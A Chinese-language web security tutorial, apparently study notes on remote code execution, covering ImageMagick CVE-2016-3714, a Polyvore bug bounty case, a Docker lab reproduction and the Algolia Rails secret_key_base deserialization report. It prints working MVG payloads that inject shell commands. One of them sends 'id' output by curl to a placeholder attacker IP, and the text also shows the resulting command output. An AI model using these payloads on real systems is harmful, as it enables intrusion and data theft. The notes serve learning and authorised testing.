1. 实例:ImageMagick远程命令执行漏洞在Polyvore的利用
ImageMagick是一个被广泛用于处理图片的软件包,用于PHP的imagick, Ruby的rmagick和NodeJS的imagemagick,在ImageMagick的众多漏洞中,一个远程代码执行漏洞危害显著。
由于ImageMagick没有处理好传入的文件名,并把它最终用于调用system()方法,攻击者可以传入一个可执行命令,类似于 https://example.com"|ls "-la
完整的命令就是:convert 'https://example.com"|ls "-la' out.png
攻击者还可以按ImageMagick定义的语法构造.mvg文件:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
以此为背景,Ben Sadeghipour测试了Polyvore网站,Ben 首先在它所控制的本地机器上测试了该漏洞,来确认mvg文件是否正常工作。这是他使用的代码:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:80
80/ -d @- > /dev/null`'
pop graphic-context
它使用了 CURL 库来调用 SOMEIPADDRESS(将其修改为你服务器的地址)。如果成功,你就会得到像这样的响应:
下面 Ben 浏览了 Polyvore,将文件上传为它的资料头像,并在它的服务器上收到了这个响应:
Tips1
- 关注软件漏洞、通用漏洞、CVE...
- 黑盒测试时关注图片上传功能
- 阅读网站所用技术的文档
2. 补充:ImageMagick-CVE-2016-3714
影响范围:ImageMagick 6.9.3-9 以前的所有版本
支持:PHP、Ruby、NodeJS 和 Python
许多网站开发者喜爱使用 ImageMagick 拓展来做 web 上的图片处理工作, 比如用户头像生成、图片编辑等。
测试:
环境:ImageMagick 命令执行漏洞(CVE-2016–3714)环境
poc文件内容
poc.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evalbug.com/"|ls -la")'
pop graphic-context
本地执行
sh-4.3# convert poc.png out.png
total 92
drwxr-xr-x 1 root root 4096 Mar 22 18:40 .
drwxr-xr-x 1 root root 4096 Mar 22 18:40 ..
-rwxr-xr-x 1 root root 0 Mar 22 18:36 .dockerenv
-rw-r--r-- 1 root root 12288 Mar 22 18:37 .poc.png.swp
drwxr-xr-x 1 root root 4096 Aug 25 2016 bin
drwxr-xr-x 2 root root 4096 Apr 11 2014 boot
drwxr-xr-x 5 root root 340 Mar 22 18:36 dev
drwxr-xr-x 1 root root 4096 Mar 22 18:36 etc
drwxr-xr-x 2 root root 4096 Apr 11 2014 home
drwxr-xr-x 1 root root 4096 Aug 25 2016 lib
drwxr-xr-x 2 root root 4096 Aug 2 2016 lib64
drwxr-xr-x 2 root root 4096 Aug 2 2016 media
drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
drwxr-xr-x 2 root root 4096 Aug 2 2016 opt
-rw-r--r-- 1 root root 103 Aug 25 2016 poc.png
dr-xr-xr-x 154 root root 0 Mar 22 18:36 proc
drwx------ 1 root root 4096 Mar 22 18:40 root
drwxr-xr-x 1 root root 4096 Aug 14 2016 run
drwxr-xr-x 1 root root 4096 Aug 12 2016 sbin
drwxr-xr-x 2 root root 4096 Aug 2 2016 srv
-rwxr-xr-x 1 root root 77 Aug 25 2016 start.sh
dr-xr-xr-x 13 root root 0 Mar 22 18:36 sys
drwxrwxrwt 1 root root 4096 Mar 22 18:40 tmp
drwxr-xr-x 1 root root 4096 Aug 25 2016 usr
drwxr-xr-x 1 root root 4096 Aug 25 2016 var
convert: unrecognized color `https://evalbug.com/"|ls -la"' @ warning/color.c/GetColorCompliance/947.
convert: no decode delegate for this image format `/tmp/magick-CUnxjsCc' @ error/constitute.c/ReadImage/584.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3164.
sh-4.3#
远程执行
上传一个简单图片上传页面到测试环境docker
upload
docker cp C:\Users\Cheng\Desktop\test.php (Container ID):/var/www/html
新建test1.png,上传至ImageMagick漏洞环境
ipconfig查看docker NAT适配器ip为10.0.75.1,关闭本机防火墙
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evalbug.com/"|curl http://10.0.75.1:8111/GambroHackImageMagick")'
pop graphic-context
主机上使用SimpleHTTPServer监听8111端口
成功收到请求
3. 实例: Algolia RCE
报告:https://hackerone.com/reports/134321
使用 Gitrob发现了Algolia在公开数据库上泄露的Rails secret_key_base
Rails的session cookie形如
session=BAh7B0kiD3Nlc3Npb25faWQGOdxM3M9BjsARg%3D%3D–dc40a55cd52fe32bb3b8
在-之前的是Base64编码,之后的是一个HMAC签名,用来校验前面编码的正确性,而HMAC签名的生成需要上面的secret作为输入。
Rails在接收cookie并验证签名的时候,会将对象反序列化,这个反序列化的过程会造成漏洞。
此时已知secret,攻击者就可以构造一个序列化对象保存成Base64编码,并正确地签名。这里可以利用metasploit的Rails Secret Deserialization工具来执行任意代码。
Tips2
Gitrob——一个查找推送到Github上的公共存储库的潜在敏感文件的工具
Rails Secret Deserialization on Metasploit-framework
Reference
Web Hacking 101
ImageMagick-CVE-2016-3714 命令执行分析
ImageMagick远程代码执行漏洞分析
ImageMagick 命令执行漏洞(CVE-2016–3714)环境
Resources
Server-Side Template Injection by James Kettle —— 归纳了各类模板的RCE